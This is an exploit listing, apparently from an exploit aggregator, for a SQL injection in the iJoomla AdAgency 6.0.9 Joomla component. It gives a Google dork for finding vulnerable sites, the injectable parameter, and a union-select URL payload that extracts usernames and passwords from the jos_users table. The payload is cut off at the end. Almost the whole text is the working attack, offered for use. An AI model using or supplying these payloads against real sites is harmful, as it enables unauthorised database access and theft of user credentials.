Exploit for iJoomla AdAgency 6.0.9 SQL Injection

Name: Exploit for iJoomla AdAgency 6.0.9 SQL Injection
Rating: 5 (52 reviews)

2020-05-02 | CVSS 0.7

## https://sploitus.com/exploit?id=PACKETSTORM:157539
# Exploit Title: iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities  
# Date: 2020.05.02  
# Author: Milad Karimi  
# Software Link:  
# Version: 6.0.9  
# Category : webapps  
# Tested on: windows 10 , firefox  
# CVE : CWE-89  
# Dork: inurl:index.php?option=com_adagency  
  
index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27[SQLI]**&camp_id=3  
  
Example:  
  
http://[site]/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=  
-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),/**/from/**/jos_users/**>